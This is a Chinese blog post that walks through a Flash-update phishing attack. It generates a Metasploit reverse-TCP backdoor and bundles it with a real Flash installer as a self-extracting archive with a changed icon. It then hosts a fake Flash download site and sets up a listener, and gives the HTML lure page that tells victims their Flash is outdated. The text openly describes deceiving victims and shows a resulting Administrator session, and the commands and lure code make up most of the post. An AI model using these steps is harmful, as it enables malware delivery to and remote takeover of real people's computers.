xss-flash钓鱼配合msf捆绑上线

已于 2023-04-21 17:06:34 修改
阅读量944 收藏 5
点赞数
文章标签: xss 网络安全
于 2023-04-21 16:49:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43225966/article/details/130291934
版权

这里写目录标题

一,后门文件生成与制作

打开kali,查看ip add 查看 ip 地址为 192.168.1.8
输入 msfconsole
1.生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=6666 -f exe > flash.exe
2.下载官方文件,保证后门可以安装正常
浏览器输入 https://www.flash.cn/ 进入flash官网
点击立即下载
3.找到刚才生成的后门文件和下载的flash文件,通过压缩进行文件捆绑
下载 WinRAR 软件
选中两个文件,鼠标右击点击 Add to archive
在这里插入图片描述
修改压缩文件名,勾选创建自解压格式压缩文件

在这里插入图片描述
切换到 高级,点击自解压选项
在这里插入图片描述
在这里插入图片描述
下载 Restorator,对图标进行修改
在这里插入图片描述
在这里插入图片描述
然后点击保存

二,flash安装钓鱼网站搭建

fake-flash项目下载
下载完后在WWW文件夹下新建一个fa文件夹,把下载的文件放到这里边

把制作好的文件上传到文件夹
在这里插入图片描述
修改

 <a href="http://localhost/fa/flash_install.exe" target="_self">立即下载</a>

在这里插入图片描述
在这里插入图片描述

三,监听

4.msf配置监听状态
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
在这里插入图片描述

四,钓鱼

诱导受害者访问url http://localhost/fa/,让他点击下载,解压后就执行了

把这段html代码放到一个公网服务器的web容器里,tomcat,nginx 等都行,
其中把window. location.href=“http://localhost/fa/” 中的localhost换成相应的ip地址,
把这个html的访问链接发送给受害者,当受害者对这段内容感兴趣时,他会打开然后发现提示flash更新,
他会点击下载,然后他下载完一解压就上线了

<html xmlns="http://www.w3.org/1999/xhtml"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
<title>搞笑视频</title> 
</head> 
<body> 
搞笑视频<br>
<img src="https://mmbiz.qpic.cn/mmbiz_gif/hBibMRJsay9tXYRRPGeYq2ViaMImcE69sMJdQ9B0icXFEAyiania5Htlib9GZWO2bEo6dE3C8dicWYibnTWyj5LIu8BRXA/640?wx_fmt=gif&wxfrom=5&wx_lazy=1" alt="" width="300" height=600" align="absmiddle"/ οnclick=a()>
</body> 
</html>
<script>													
function a(){
	alert( "您的FLASH版本过低,尝试升级后访问该页面! ");
	window. location.href="http://localhost/fa/";
}
</script>

电脑管家提示报毒,先暂不处理,先不考虑免杀
在这里插入图片描述
成功上线
在这里插入图片描述
输入getuid 查看当前用户名 为 Administrator
在这里插入图片描述

研究猿小刘
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实战审计cms之CSRF——CSRF+Xss+Flash钓鱼
hackzkaq的博客
05-18 532
更多渗透技能 欢迎搜索公众号:白帽子左一 作者:掌控安全-holic 前言 CSRF感觉似乎很不值钱的样子,我前几天审计出了3个后台存储xss+csrf 然后cnvd跟我说不收csrf和后台存储xss,自此后台我从不找xss和csrf 但是毕竟作为目前毕竟出名流行的一个漏洞,还是讲解一下,我会讲的很简单,ojbk 0x01 CSRF介绍 CSRF的全名为Cross-site request forgery,它的中文名为 跨站请求伪造 CSRF是一种夹持用户在已经登陆的web应用程序上执行非本意的操
Xss——Flash钓鱼
weixin_56291508的博客
04-22 697
Xss——Flash钓鱼
XSS另类攻击(五)Flash钓鱼配合MSF捆绑上线
最新发布
06-02 888
一文告诉你如何Flash钓鱼配合MSF捆绑上线
xxs-flash-钓鱼
qq_38618396的博客
12-27 747
0x00 准备 1、源码:https://github.com/r00tSe7en/Fake-flash.cn 2、域名:一个和flash相近的域名和一台服务器 3、木马:cobalstrike生成木马 4、其他:flash安装包 0x01 实际操作 搭建环境 第一步:下载源代码,直接在使用phpstudy搭建一个网站: 第二步:启动cs,制作木马 使用cs生成一个木马 第三步:下载flash安装程序 在这里插入图片描述 ...
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2750
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
xss-labs-master.rar
05-09
XSS实验室详解:从入门到精通》 XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器中注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
**XSS注入详解** XSS(Cross Site Scripting),即跨站脚本攻击,是一种常见的Web应用程序安全漏洞。它允许攻击者在用户浏览器上执行恶意脚本,从而获取敏感信息、操控用户行为或进行钓鱼攻击。`xss-labs-master....
xss-labs-master源码
07-06
XSS Labs Master源码详解:深度探索跨站脚本攻击与防御》 XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上执行恶意脚本,进而盗取用户数据或控制用户的行为。"xss-labs-...
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
前端开源库-xss-filters
08-29
在前端开发中,XSS(Cross-site scripting)攻击是一种常见的安全威胁,它允许攻击者通过注入恶意脚本到网页上,从而控制用户浏览器的行为。"前端开源库-xss-filters"是一个专门针对这种情况设计的开源库,其目标是...
xss钓鱼演示
qq_42764906的博客
04-22 246
在存储型XSS里输入(注:和上一节一样需要根据路径更改网址) 得到(弹出) 因为是存储型XSS 再次打开还会弹出这个页面
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2096
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
渗透测试-xss钓鱼测试和xss盲打
lza20001103的博客
04-24 2343
渗透测试-xss钓鱼测试和xss盲打
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
m0_65336233的博客
10-13 1166
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
set+MSF进行网站钓鱼
道长道长的博客
09-25 165
SET最常用的攻击方法有:用恶意附件对目标进行 E-mail 钓鱼攻击、Java Applet攻击、基于浏览器的漏洞攻击、收集网站认证信息、建立感染的便携媒体、邮件群发等攻击手段。本文将演示如何借助 SET+MSF 渗透工具对 Win 11 靶机进行网络钓鱼(欺骗用户的账号密码)。
MSF 综合利用: BEEF & XSS攻击(炊少教学)
weiliang369的博客
02-27 378
获得Beef 先安装git apt-get install git brk@Dis9Team:/pen$ sudo git clone https://github.com/beefproject/beef 配置和安装 数据库支持: apt-get install libssl-dev libsqlite3-dev sqlite 我用sqlite数据库 简单 不麻烦 RUBY配置: brk@Dis9Team:/pen/beef$ sudo gem install bundler Fetch
MSF&Powershell钓鱼攻击
p01son的博客
06-02 326
Powershell是windows下面非常强大的命令行工具,Framework的强大功能,也可以调用windows API,在win7/server 2008以后,powershell已被集成在系统当中。除此之外,使用powershell能很好的bypass各种AV,在渗透测试中可谓是一个神器。此次使用的是开源的powershell脚本集nishang中的client来制作钓鱼文件。其中office类型文件可以达到钓鱼目的的前提是office已经启用宏。
Kali Linux—借助 SET+MSF 进行网络钓鱼、生成木马、获主机shell、权限提升、远程监控、钓鱼邮件等完整渗透测试(三)
weixin_72849553的博客
12-24 1852
Swaks 是一款类似于“瑞士军刀”的工具,之所以这么说是因为它在SMTP邮件协议领域有非常非常广泛的应用,同时对于一名信息安全高级工程师来说也是一个不错的利用工具!它通常被用来伪造邮件,进行钓鱼、社工等操作。Swaks基本用法:1、swaks --to test@qq.com 测试邮箱的连通性;--from test@qq.com //发件人邮箱;--ehlo//伪造邮件ehlo头,即是发件人邮箱的域名。提供身份认证--body "" //引号中的内容即为邮件正文;
X-XSS-Protection缺失 修复
06-13
X-XSS-Protection是一个HTTP响应头,用于防止跨站脚本攻击(XSS)。如果该头缺失,可能会导致攻击者通过注入恶意脚本来攻击网站用户。为了修复这个问题,您可以在Web服务器或应用程序中配置该头。以下是一些具体的步骤: 1. 在Web服务器上配置X-XSS-Protection头。例如,在Apache服务器中,您可以在配置文件中添加以下行: Header set X-XSS-Protection "1; mode=block" 2. 在应用程序中使用编程语言来添加X-XSS-Protection头。例如,在PHP中,您可以使用以下代码: header("X-XSS-Protection: 1; mode=block"); 3. 使用Web应用程序防火墙(WAF)来过滤和阻止恶意脚本。 无论哪种方法,都应该测试您的网站以确保X-XSS-Protection头已正确配置。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值